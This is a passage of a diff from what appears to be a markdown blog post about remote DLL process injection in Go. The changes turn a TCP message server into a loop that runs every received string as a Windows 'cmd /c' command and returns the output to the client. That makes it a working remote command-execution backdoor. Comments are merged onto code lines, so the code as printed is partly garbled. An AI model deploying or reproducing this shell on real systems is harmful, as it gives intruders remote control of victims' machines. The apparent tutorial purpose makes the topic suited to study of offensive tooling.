timsonner/sveltekit-markdown-blog/blog/src/routes/blog/go-remote-dll-process-injection.md

 	// Create a decoder to decode the binary data received from the client connection decoder := gob.NewDecoder(conn)

+	// Create an encoder to encode the response message and send it back to the client encoder := gob.NewEncoder(conn)

+	for {
 		// Create a new empty message to hold the decoded message content var message Message

 		// Decode the message received from the client into the message variable err := decoder.Decode(&message)
 		if err != nil {
 			fmt.Println("Error decoding message:", err)
-		return
+			break
 		}

-	fmt.Println("Received message:", message.Content) // Print the received message content
+		fmt.Println("Received command:", message.Content) // Print the received command

+		// Create a response message with empty output and error message fields response := Response{}

+		// Execute the command and capture the output and error streams cmd := exec.Command("cmd", "/c", message.Content)
+		output, err := cmd.Output()
+		if err != nil {
+			response.ErrorMessage = err.Error()
+		}
+		response.Output = string(output)

+		// Send the response message back to the client err = encoder.Encode(response)
+		if err != nil {
+			fmt.Println("Error encoding response:", err)
+			break
+		}

+		// Check if the client wants to exit if strings.ToLower(message.Content) == "exit" {
+			break
+		}
+	}

 	conn.Close() // Close the connection with the client }